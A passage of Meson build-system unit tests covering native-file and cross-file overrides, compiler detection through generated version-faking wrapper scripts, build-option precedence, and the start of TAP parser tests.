'project#/': {'version': '0.0.1', 'default_options': ['cpp_std=c++14', 'debug=true']},
'target#tgt1': {'build_by_default': True},
'dependency#dep1': {'required': False}
}
}
self.assertDictEqual(out, expected)
class NativeFileTests(BasePlatformTests):
def setUp(self):
super().setUp()
self.testcase = os.path.join(self.unit_test_dir, '47 native file binary')
self.current_config = 0
self.current_wrapper = 0
def helper_create_native_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
if isinstance(v, (bool, int, float)):
f.write("{}={}\n".format(k, v))
elif isinstance(v, list):
f.write("{}=[{}]\n".format(k, ', '.join(["'{}'".format(w) for w in v])))
else:
f.write("{}='{}'\n".format(k, v))
return filename
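# A minimal sketch of what a (hypothetical) call produces:
#   helper_create_native_file({'binaries': {'bash': '/usr/bin/bash'},
#                              'built-in options': {'werror': True}})
# writes a config file containing roughly:
#   [binaries]
#   bash='/usr/bin/bash'
#   [built-in options]
#   werror=True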
def helper_create_binary_wrapper(self, binary, dir_=None, extra_args=None, **kwargs):
"""Creates a wrapper around a binary that overrides specific values."""
filename = os.path.join(dir_ or self.builddir, 'binary_wrapper{}.py'.format(self.current_wrapper))
extra_args = extra_args or {}
self.current_wrapper += 1
if is_haiku():
chbang = '#!/bin/env python3'
else:
chbang = '#!/usr/bin/env python3'
with open(filename, 'wt') as f:
f.write(textwrap.dedent('''\
{}
import argparse
import subprocess
import sys
def main():
parser = argparse.ArgumentParser()
'''.format(chbang)))
for name in chain(extra_args, kwargs):
f.write(' parser.add_argument("-{0}", "--{0}", action="store_true")\n'.format(name))
f.write(' args, extra_args = parser.parse_known_args()\n')
for name, value in chain(extra_args.items(), kwargs.items()):
f.write(' if args.{}:\n'.format(name))
f.write(' print("{}", file=sys.{})\n'.format(value, kwargs.get('outfile', 'stdout')))
f.write(' sys.exit(0)\n')
f.write(textwrap.dedent('''
ret = subprocess.run(
["{}"] + extra_args,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
print(ret.stdout.decode('utf-8'))
print(ret.stderr.decode('utf-8'), file=sys.stderr)
sys.exit(ret.returncode)
if __name__ == '__main__':
main()
'''.format(binary)))
if not is_windows():
os.chmod(filename, 0o755)
return filename
# On windows we need yet another level of indirection, as cmd cannot
# invoke python files itself, so instead we generate a .bat file, which
# invokes our python wrapper
batfile = os.path.join(self.builddir, 'binary_wrapper{}.bat'.format(self.current_wrapper))
with open(batfile, 'wt') as f:
f.write(r'@{} {} %*'.format(sys.executable, filename))
return batfile
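# Sketch of the behaviour for a hypothetical call:
#   helper_create_binary_wrapper('bash', version='12345')
# returns a script that prints '12345' when invoked with --version and forwards
# every other invocation to the real 'bash'.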
def helper_for_compiler(self, lang, cb, for_machine = MachineChoice.HOST):
"""Helper for generating tests for overriding compilers for langaugages
with more than one implementation, such as C, C++, ObjC, ObjC++, and D.
"""
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, for_machine)
cc = getter()
binary, newid = cb(cc)
env.binaries[for_machine].binaries[lang] = binary
compiler = getter()
self.assertEqual(compiler.id, newid)
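# The callback receives the currently detected compiler and returns a tuple of
# (binary name to write into the machine file, expected compiler id); see the
# callback in test_c_compiler below for a concrete example.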
def test_multiple_native_files_override(self):
wrapper = self.helper_create_binary_wrapper('bash', version='foo')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config2 = self.helper_create_native_file({'binaries': {'bash': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
# This test hangs on cygwin.
@unittest.skipIf(os.name != 'posix' or is_cygwin(), 'Uses fifos, which are not available on non Unix OSes.')
def test_native_file_is_pipe(self):
fifo = os.path.join(self.builddir, 'native.file')
os.mkfifo(fifo)
with tempfile.TemporaryDirectory() as d:
wrapper = self.helper_create_binary_wrapper('bash', d, version='12345')
def filler():
with open(fifo, 'w') as f:
f.write('[binaries]\n')
f.write("bash = '{}'\n".format(wrapper))
thread = threading.Thread(target=filler)
thread.start()
self.init(self.testcase, extra_args=['--native-file', fifo, '-Dcase=find_program'])
thread.join()
os.unlink(fifo)
self.init(self.testcase, extra_args=['--wipe'])
def test_multiple_native_files(self):
wrapper = self.helper_create_binary_wrapper('bash', version='12345')
config = self.helper_create_native_file({'binaries': {'bash': wrapper}})
wrapper = self.helper_create_binary_wrapper('python')
config2 = self.helper_create_native_file({'binaries': {'python': wrapper}})
self.init(self.testcase, extra_args=[
'--native-file', config, '--native-file', config2,
'-Dcase=find_program'])
def _simple_test(self, case, binary, entry=None):
wrapper = self.helper_create_binary_wrapper(binary, version='12345')
config = self.helper_create_native_file({'binaries': {entry or binary: wrapper}})
self.init(self.testcase, extra_args=['--native-file', config, '-Dcase={}'.format(case)])
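# Example (as used by test_find_program below): _simple_test('find_program', 'bash')
# wraps 'bash' to report version 12345, points a native file at the wrapper,
# and configures the test project with -Dcase=find_program.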
def test_find_program(self):
self._simple_test('find_program', 'bash')
def test_config_tool_dep(self):
# Do the skip at this level to avoid screwing up the cache
if mesonbuild.environment.detect_msys2_arch():
raise unittest.SkipTest('Skipped due to problems with LLVM on MSYS2')
if not shutil.which('llvm-config'):
raise unittest.SkipTest('llvm-config not installed, cannot test')
self._simple_test('config_dep', 'llvm-config')
def test_python3_module(self):
self._simple_test('python3', 'python3')
def test_python_module(self):
if is_windows():
# Bat adds extra crap to stdout, so the version check logic in the
# python module breaks. This is fine on other OSes because they
# don't need the extra indirection.
raise unittest.SkipTest('bat indirection breaks internal sanity checks.')
elif is_osx():
binary = 'python'
else:
binary = 'python2'
# We may not have python2 available, so check for it
for v in ['2', '2.7', '-2.7']:
rc = subprocess.call(['pkg-config', '--cflags', 'python{}'.format(v)],
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL)
if rc == 0:
break
else:
raise unittest.SkipTest('Not running Python 2 tests because dev packages not installed.')
self._simple_test('python', binary, entry='python')
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CC')
def test_c_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('c', cb)
@unittest.skipIf(is_windows(), 'Setting up multiple compilers on windows is hard')
@skip_if_env_set('CXX')
def test_cpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('cpp', cb)
@skip_if_not_language('objc')
@skip_if_env_set('OBJC')
def test_objc_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang', 'clang'
if not is_real_gnu_compiler(shutil.which('gcc')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'gcc', 'gcc'
self.helper_for_compiler('objc', cb)
@skip_if_not_language('objcpp')
@skip_if_env_set('OBJCXX')
def test_objcpp_compiler(self):
def cb(comp):
if comp.id == 'gcc':
if not shutil.which('clang++'):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'clang++', 'clang'
if not is_real_gnu_compiler(shutil.which('g++')):
raise unittest.SkipTest('Only one compiler found, cannot test.')
return 'g++', 'gcc'
self.helper_for_compiler('objcpp', cb)
@skip_if_not_language('d')
@skip_if_env_set('DC')
def test_d_compiler(self):
def cb(comp):
if comp.id == 'dmd':
if shutil.which('ldc'):
return 'ldc', 'ldc'
elif shutil.which('gdc'):
return 'gdc', 'gdc'
else:
raise unittest.SkipTest('No alternative dlang compiler found.')
if shutil.which('dmd'):
return 'dmd', 'dmd'
raise unittest.SkipTest('No alternative dlang compiler found.')
self.helper_for_compiler('d', cb)
@skip_if_not_language('cs')
@skip_if_env_set('CSC')
def test_cs_compiler(self):
def cb(comp):
if comp.id == 'csc':
if not shutil.which('mcs'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'mcs', 'mcs'
if not shutil.which('csc'):
raise unittest.SkipTest('No alternate C# implementation.')
return 'csc', 'csc'
self.helper_for_compiler('cs', cb)
@skip_if_not_language('fortran')
@skip_if_env_set('FC')
def test_fortran_compiler(self):
def cb(comp):
if comp.id == 'lcc':
if shutil.which('lfortran'):
return 'lfortran', 'lcc'
raise unittest.SkipTest('No alternate Fortran implementation.')
elif comp.id == 'gcc':
if shutil.which('ifort'):
# There is an ICC for windows (windows build, linux host),
# but we don't support that ATM so let's not worry about it.
if is_windows():
return 'ifort', 'intel-cl'
return 'ifort', 'intel'
elif shutil.which('flang'):
return 'flang', 'flang'
elif shutil.which('pgfortran'):
return 'pgfortran', 'pgi'
# XXX: there are several other fortran compilers meson
# supports, but I don't have any of them to test with
raise unittest.SkipTest('No alternate Fortran implementation.')
if not shutil.which('gfortran'):
raise unittest.SkipTest('No alternate Fortran implementation.')
return 'gfortran', 'gcc'
self.helper_for_compiler('fortran', cb)
def _single_implementation_compiler(self, lang: str, binary: str, version_str: str, version: str) -> None:
"""Helper for languages with a single (supported) implementation.
Builds a wrapper around the compiler to override the version.
"""
wrapper = self.helper_create_binary_wrapper(binary, version=version_str)
env = get_fake_env()
getter = getattr(env, 'detect_{}_compiler'.format(lang))
getter = functools.partial(getter, MachineChoice.HOST)
env.binaries.host.binaries[lang] = [wrapper]
compiler = getter()
self.assertEqual(compiler.version, version)
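# Example (see test_vala_compiler below):
#   _single_implementation_compiler('vala', 'valac', 'Vala 1.2345', '1.2345')
# wraps valac so that it reports 'Vala 1.2345' and asserts that the detected
# compiler version is parsed as '1.2345'.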
@skip_if_not_language('vala')
@skip_if_env_set('VALAC')
def test_vala_compiler(self):
self._single_implementation_compiler(
'vala', 'valac', 'Vala 1.2345', '1.2345')
@skip_if_not_language('rust')
@skip_if_env_set('RUSTC')
def test_rust_compiler(self):
self._single_implementation_compiler(
'rust', 'rustc', 'rustc 1.2345', '1.2345')
@skip_if_not_language('java')
def test_java_compiler(self):
self._single_implementation_compiler(
'java', 'javac', 'javac 9.99.77', '9.99.77')
@skip_if_not_language('swift')
def test_swift_compiler(self):
wrapper = self.helper_create_binary_wrapper(
'swiftc', version='Swift 1.2345', outfile='stderr',
extra_args={'Xlinker': 'macosx_version. PROJECT:ld - 1.2.3'})
env = get_fake_env()
env.binaries.host.binaries['swift'] = [wrapper]
compiler = env.detect_swift_compiler(MachineChoice.HOST)
self.assertEqual(compiler.version, '1.2345')
def test_native_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile')])
def test_native_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib'])
def test_compile_sys_path(self):
"""Compiling with a native file stored in a system path works.
There was a bug which caused the paths to be stored incorrectly and
would result in ninja invoking meson in an infinite loop. This tests
for that by actually invoking ninja.
"""
testcase = os.path.join(self.common_test_dir, '1 trivial')
# It really doesn't matter what's in the native file, just that it exists
config = self.helper_create_native_file({'binaries': {'bash': 'false'}})
self.init(testcase, extra_args=['--native-file', config])
self.build()
def test_user_options(self):
testcase = os.path.join(self.common_test_dir, '41 options')
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0),
('CaseSenSiTivE', 'SOME other Value'),
('CASESENSITIVE', 'some other Value')]:
config = self.helper_create_native_file({'project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_user_options_command_line_overrides(self):
testcase = os.path.join(self.common_test_dir, '41 options')
config = self.helper_create_native_file({'project options': {'other_one': True}})
self.init(testcase, extra_args=['--native-file', config, '-Dother_one=false'])
def test_user_options_subproject(self):
testcase = os.path.join(self.unit_test_dir, '80 user options for subproject')
s = os.path.join(testcase, 'subprojects')
if not os.path.exists(s):
os.mkdir(s)
s = os.path.join(s, 'sub')
if not os.path.exists(s):
sub = os.path.join(self.common_test_dir, '41 options')
shutil.copytree(sub, s)
for opt, value in [('testoption', 'some other val'), ('other_one', True),
('combo_opt', 'one'), ('array_opt', ['two']),
('integer_opt', 0)]:
config = self.helper_create_native_file({'sub:project options': {opt: value}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--native-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_option_bool(self):
# Bools are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'werror': True}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Find the werror option and check that the value from the native file was applied
if 'werror' in each['name']:
self.assertEqual(each['value'], True)
break
else:
self.fail('Did not find werror in build options?')
def test_option_integer(self):
# Integers are allowed to be unquoted
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({'built-in options': {'unity_size': 100}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
# Find the unity_size option and check that the value from the native file was applied
if 'unity_size' in each['name']:
self.assertEqual(each['value'], 100)
break
else:
self.fail('Did not find unity_size in build options?')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('Did not find cpp_std in build options?')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_native_file({'built-in options': {'pkg_config_path': '/foo'}})
self.init(testcase, extra_args=['--native-file', config], override_envvars={'PKG_CONFIG_PATH': '/bar'})
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/foo'])
break
else:
self.fail('Did not find pkg_config_path in build options?')
def test_builtin_options_subprojects(self):
testcase = os.path.join(self.common_test_dir, '99 subproject subdir')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both', 'c_args': ['-Dfoo']}, 'sub:built-in options': {'default_library': 'static'}})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
# Test that options which are not set per-subproject are inherited from the parent
if 'c_args' in each['name']:
# This path will be hit twice, once for build and once for host.
self.assertEqual(each['value'], ['-Dfoo'])
found += 1
elif each['name'] == 'default_library':
self.assertEqual(each['value'], 'both')
found += 1
elif each['name'] == 'sub:default_library':
self.assertEqual(each['value'], 'static')
found += 1
self.assertEqual(found, 4, 'Did not find all four expected options')
def test_builtin_options_subprojects_overrides_buildfiles(self):
# If the buildfile says subproject(... default_library: shared), ensure that's overwritten
testcase = os.path.join(self.common_test_dir, '224 persubproject options')
config = self.helper_create_native_file({'sub2:built-in options': {'default_library': 'shared'}})
with self.assertRaises((RuntimeError, subprocess.CalledProcessError)) as cm:
self.init(testcase, extra_args=['--native-file', config])
if isinstance(cm.exception, RuntimeError):
check = str(cm.exception)
else:
check = cm.exception.stdout
self.assertIn('Parent should override default_library', check)
def test_builtin_options_subprojects_dont_inherit_parent_override(self):
# Ensure that a subproject's own default_library setting is not overridden
# by the default_library the parent sets via the native file.
testcase = os.path.join(self.common_test_dir, '224 persubproject options')
config = self.helper_create_native_file({'built-in options': {'default_library': 'both'}})
self.init(testcase, extra_args=['--native-file', config])
def test_builtin_options_compiler_properties(self):
# the properties section can have lang_args, and those need to be
# overwritten by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'c_args': ['-DFOO']},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DFOO'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_compiler_properties_legacy(self):
# The legacy placement in properties is still valid if a 'built-in
# options' setting is present, but doesn't have the lang_args
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'properties': {'c_args': ['-DBAR']},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'c_args':
self.assertEqual(each['value'], ['-DBAR'])
break
else:
self.fail('Did not find c_args in build options?')
def test_builtin_options_paths(self):
# the paths section can also set directory options such as bindir, and
# those need to be overridden by the built-in options
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'bindir': 'foo'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'foo')
break
else:
self.fail('Did not find bindir in build options?')
def test_builtin_options_paths_legacy(self):
testcase = os.path.join(self.common_test_dir, '1 trivial')
config = self.helper_create_native_file({
'built-in options': {'default_library': 'static'},
'paths': {'bindir': 'bar'},
})
self.init(testcase, extra_args=['--native-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'bindir':
self.assertEqual(each['value'], 'bar')
break
else:
self.fail('Did not find bindir in build options?')
class CrossFileTests(BasePlatformTests):
"""Tests for cross file functionality not directly related to
cross compiling.
This is mainly aimed at testing overrides from cross files.
"""
def setUp(self):
super().setUp()
self.current_config = 0
self.current_wrapper = 0
def _cross_file_generator(self, *, needs_exe_wrapper: bool = False,
exe_wrapper: T.Optional[T.List[str]] = None) -> str:
if is_windows():
raise unittest.SkipTest('Cannot run this test on non-mingw/non-cygwin windows')
return textwrap.dedent(f"""\
[binaries]
c = '{shutil.which('gcc' if is_sunos() else 'cc')}'
ar = '{shutil.which('ar')}'
strip = '{shutil.which('strip')}'
exe_wrapper = {str(exe_wrapper) if exe_wrapper is not None else '[]'}
[properties]
needs_exe_wrapper = {needs_exe_wrapper}
[host_machine]
system = 'linux'
cpu_family = 'x86'
cpu = 'i686'
endian = 'little'
""")
def _stub_exe_wrapper(self) -> str:
return textwrap.dedent('''\
#!/usr/bin/env python3
import subprocess
import sys
sys.exit(subprocess.run(sys.argv[1:]).returncode)
''')
def test_needs_exe_wrapper_true(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
def test_needs_exe_wrapper_false(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=False))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
out = self.run_target('test')
self.assertNotRegex(out, r'Skipped:\s*1\n')
def test_needs_exe_wrapper_true_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
s = Path(d) / 'wrapper.py'
with s.open('wt') as f:
f.write(self._stub_exe_wrapper())
s.chmod(0o774)
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(
needs_exe_wrapper=True,
exe_wrapper=[str(s)]))
self.init(testdir, extra_args=['--cross-file=' + str(p), '-Dexpect=true'])
out = self.run_target('test')
self.assertRegex(out, r'Ok:\s*3\s*\n')
def test_cross_exe_passed_no_wrapper(self):
testdir = os.path.join(self.unit_test_dir, '72 cross test passed')
with tempfile.TemporaryDirectory() as d:
p = Path(d) / 'crossfile'
with p.open('wt') as f:
f.write(self._cross_file_generator(needs_exe_wrapper=True))
self.init(testdir, extra_args=['--cross-file=' + str(p)])
self.build()
out = self.run_target('test')
self.assertRegex(out, r'Skipped:\s*1\s*\n')
# The test uses mocking and thus requires that the current process is the
# one to run the Meson steps. If we are using an external test executable
# (most commonly in Debian autopkgtests) then the mocking won't work.
@unittest.skipIf('MESON_EXE' in os.environ, 'MESON_EXE is defined, can not use mocking.')
def test_cross_file_system_paths(self):
if is_windows():
raise unittest.SkipTest('system crossfile paths not defined for Windows (yet)')
testdir = os.path.join(self.common_test_dir, '1 trivial')
cross_content = self._cross_file_generator()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
with mock.patch.dict(os.environ, {'XDG_DATA_HOME': d}):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with mock.patch.dict(os.environ, {'XDG_DATA_DIRS': d}):
os.environ.pop('XDG_DATA_HOME', None)
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
with tempfile.TemporaryDirectory() as d:
dir_ = os.path.join(d, '.local', 'share', 'meson', 'cross')
os.makedirs(dir_)
with tempfile.NamedTemporaryFile('w', dir=dir_, delete=False) as f:
f.write(cross_content)
name = os.path.basename(f.name)
# If XDG_DATA_HOME is set in the environment running the
# tests this test will fail, so mock the environment, pop
# it, then test
with mock.patch.dict(os.environ):
os.environ.pop('XDG_DATA_HOME', None)
with mock.patch('mesonbuild.coredata.os.path.expanduser', lambda x: x.replace('~', d)):
self.init(testdir, extra_args=['--cross-file=' + name], inprocess=True)
self.wipe()
def helper_create_cross_file(self, values):
"""Create a config file as a temporary file.
values should be a nested dictionary structure of {section: {key:
value}}
"""
filename = os.path.join(self.builddir, 'generated{}.config'.format(self.current_config))
self.current_config += 1
with open(filename, 'wt') as f:
for section, entries in values.items():
f.write('[{}]\n'.format(section))
for k, v in entries.items():
f.write("{}='{}'\n".format(k, v))
return filename
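# Same format as NativeFileTests.helper_create_native_file, e.g. a hypothetical
#   helper_create_cross_file({'binaries': {'strip': '/usr/bin/strip'}})
# produces a file containing:
#   [binaries]
#   strip='/usr/bin/strip'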
def test_cross_file_dirs(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_overridden(self):
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'-Ddef_libdir=liblib', '-Dlibdir=liblib',
'-Ddef_bindir=binbar',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_cross_file_dirs_chain(self):
# crossfile2 overrides crossfile overrides nativefile
testcase = os.path.join(self.unit_test_dir, '60 native file override')
self.init(testcase, default_args=False,
extra_args=['--native-file', os.path.join(testcase, 'nativefile'),
'--cross-file', os.path.join(testcase, 'crossfile'),
'--cross-file', os.path.join(testcase, 'crossfile2'),
'-Ddef_bindir=binbar2',
'-Ddef_datadir=databar',
'-Ddef_includedir=includebar',
'-Ddef_infodir=infobar',
'-Ddef_libdir=libbar',
'-Ddef_libexecdir=libexecbar',
'-Ddef_localedir=localebar',
'-Ddef_localstatedir=localstatebar',
'-Ddef_mandir=manbar',
'-Ddef_sbindir=sbinbar',
'-Ddef_sharedstatedir=sharedstatebar',
'-Ddef_sysconfdir=sysconfbar'])
def test_user_options(self):
# This is just a touch test for cross file, since the implementation
# shares code after loading from the files
testcase = os.path.join(self.common_test_dir, '41 options')
config = self.helper_create_cross_file({'project options': {'testoption': 'some other value'}})
with self.assertRaises(subprocess.CalledProcessError) as cm:
self.init(testcase, extra_args=['--cross-file', config])
self.assertRegex(cm.exception.stdout, r'Incorrect value to [a-z]+ option')
def test_builtin_options(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'cpp_std': 'c++14'}})
self.init(testcase, extra_args=['--cross-file', config])
configuration = self.introspect('--buildoptions')
for each in configuration:
if each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++14')
break
else:
self.fail('No c++ standard set?')
def test_builtin_options_per_machine(self):
"""Test options that are allowed to be set on a per-machine basis.
        Such options could be passed twice, once for the build machine, and
        once for the host machine. I've picked the pkg-config path, but any
        option that can be set for both machines would do.
"""
testcase = os.path.join(self.common_test_dir, '2 cpp')
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross/path', 'cpp_std': 'c++17'}})
native = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native/path', 'cpp_std': 'c++14'}})
# Ensure that PKG_CONFIG_PATH is not set in the environment
with mock.patch.dict('os.environ'):
for k in ['PKG_CONFIG_PATH', 'PKG_CONFIG_PATH_FOR_BUILD']:
try:
del os.environ[k]
except KeyError:
pass
self.init(testcase, extra_args=['--cross-file', cross, '--native-file', native])
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross/path'])
found += 1
elif each['name'] == 'cpp_std':
self.assertEqual(each['value'], 'c++17')
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native/path'])
found += 1
elif each['name'] == 'build.cpp_std':
self.assertEqual(each['value'], 'c++14')
found += 1
if found == 4:
break
self.assertEqual(found, 4, 'Did not find all sections.')
def test_builtin_options_conf_overrides_env(self):
testcase = os.path.join(self.common_test_dir, '2 cpp')
config = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/native'}})
cross = self.helper_create_cross_file({'built-in options': {'pkg_config_path': '/cross'}})
self.init(testcase, extra_args=['--native-file', config, '--cross-file', cross],
override_envvars={'PKG_CONFIG_PATH': '/bar', 'PKG_CONFIG_PATH_FOR_BUILD': '/dir'})
configuration = self.introspect('--buildoptions')
found = 0
for each in configuration:
if each['name'] == 'pkg_config_path':
self.assertEqual(each['value'], ['/cross'])
found += 1
elif each['name'] == 'build.pkg_config_path':
self.assertEqual(each['value'], ['/native'])
found += 1
if found == 2:
break
self.assertEqual(found, 2, 'Did not find all sections.')
class TAPParserTests(unittest.TestCase):
def assert_test(self, events, **kwargs):
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Test(**kwargs))
def assert_plan(self, events, **kwargs):
if 'skipped' not in kwargs:
kwargs['skipped'] = False
if 'explanation' not in kwargs:
kwargs['explanation'] = None
self.assertEqual(next(events), TAPParser.Plan(**kwargs))
def assert_version(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Version(**kwargs))
def assert_error(self, events):
self.assertEqual(type(next(events)), TAPParser.Error)
def assert_bailout(self, events, **kwargs):
self.assertEqual(next(events), TAPParser.Bailout(**kwargs))
def assert_last(self, events):
with self.assertRaises(StopIteration):
next(events)
def parse_tap(self, s):
parser = TAPParser()
return iter(parser.parse(io.StringIO(s)))
def parse_tap_v13(self, s):
events = self.parse_tap('TAP version 13\n' + s)
self.assert_version(events, version=13)
return events
def test_empty(self):
events = self.parse_tap('')
self.assert_last(events)
def test_empty_plan(self):
events = self.parse_tap('1..0')
self.assert_plan(events, num_tests=0, late=False, skipped=True)
self.assert_last(events)
def test_plan_directive(self):
events = self.parse_tap('1..0 # skipped for some reason')
self.assert_plan(events, num_tests=0, late=False, skipped=True,
explanation='for some reason')
self.assert_last(events)
events = self.parse_tap('1..1 # skipped for some reason\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=True,
explanation='for some reason')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
events = self.parse_tap('1..1 # todo not supported here\nok 1')
self.assert_error(events)
self.assert_plan(events, num_tests=1, late=False, skipped=False,
explanation='not supported here')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_ok(self):
events = self.parse_tap('ok')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_number(self):
events = self.parse_tap('ok 1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_one_test_with_name(self):
